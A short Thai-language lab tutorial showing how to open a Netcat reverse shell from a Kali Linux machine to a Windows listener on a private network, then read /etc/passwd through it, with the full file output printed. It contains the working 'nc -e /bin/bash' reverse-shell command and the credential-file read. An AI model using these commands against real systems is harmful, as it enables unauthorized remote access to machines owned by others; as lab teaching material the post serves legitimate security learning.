How to perform the Reverse shell by Netcat

บทนำ (Overview)

จากบทความที่แล้วอธิบายถึงการเชื่อมต่อ ระหว่าง “Client” และ “Server” แบบ “Bind shell” (How to perform the Bind Shell by Netcat) ซึ่งทาง Server จะเชื่อมต่อ “Command prompt” ของตัวเองให้ “Client” สามารถเรียกใช้ได้ มาคราวนี้จะมาลองทำในสิ่งที่เรียกว่า “Reverse shell” โดยทาง “Client” จะส่ง “Command prompt” ของตัวเองไปให้ “Server”

ขั้นตอน (Steps)

  1. ดาวน์โหลด “Netcat” สำหรับ “Windows” (https://www.dropbox.com/s/l2i0yxkrl5p25tr/nc111nt.zip?dl=0)
  2. เปิด “Netcat” ของฝั่ง “Windows” เป็น “Server” โดยใช้คำสั่งดังต่อไปนี้
    C:\Users\[user]\Desktop\nc111nt
    λ nc -nlvp 7777
    listening on [any] 7777 ...
    
  3. จากนั้นให้ทาง “Kali” เป็นฝั่ง “Client” เชื่อมต่อไปยัง “Server” โดยส่ง “Reverse shell” จากเครื่อง “Kali” ไปยัง “Windows”
    root@kali:~# nc -nv 192.168.1.39 7777 -e /bin/bash
    nc: 192.168.1.39 7777 open
    
  4. ตรวจสอบที่ฝั่ง “Server” พบว่ามีการเชื่อมต่อเข้ามา
    λ nc -nlvp 7777
    listening on [any] 7777 ...
    connect to [192.168.1.39] from (UNKNOWN) [192.168.1.39] 32932
    
  5. จากนั้นลองใช้สำสั่งของ “Kali linux” ตรวจสอบไฟล์ /etc/passwd
    λ nc -nlvp 7777
    listening on [any] 7777 ...
    connect to [192.168.1.39] from (UNKNOWN) [192.168.1.39] 32932
    cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
    messagebus:x:102:106::/var/run/dbus:/bin/false
    colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
    usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
    miredo:x:105:65534::/var/run/miredo:/bin/false
    ntp:x:106:113::/home/ntp:/bin/false
    Debian-exim:x:107:114::/var/spool/exim4:/bin/false
    arpwatch:x:108:117:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
    avahi:x:109:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
    dradis:x:111:121::/var/lib/dradis:/bin/false
    pulse:x:112:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
    haldaemon:x:114:124:Hardware abstraction layer,,,:/var/run/hald:/bin/false
    iodine:x:115:65534::/var/run/iodine:/bin/false
    postgres:x:116:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
    redsocks:x:118:128::/var/run/redsocks:/bin/false
    snmp:x:119:129::/var/lib/snmp:/bin/false
    stunnel4:x:120:130::/var/run/stunnel4:/bin/false
    statd:x:121:65534::/var/lib/nfs:/bin/false
    sslh:x:122:133::/nonexistent:/bin/false
    Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
    rtkit:x:124:136:RealtimeKit,,,:/proc:/bin/false
    saned:x:125:137::/home/saned:/bin/false
    
    

ใส่ความเห็น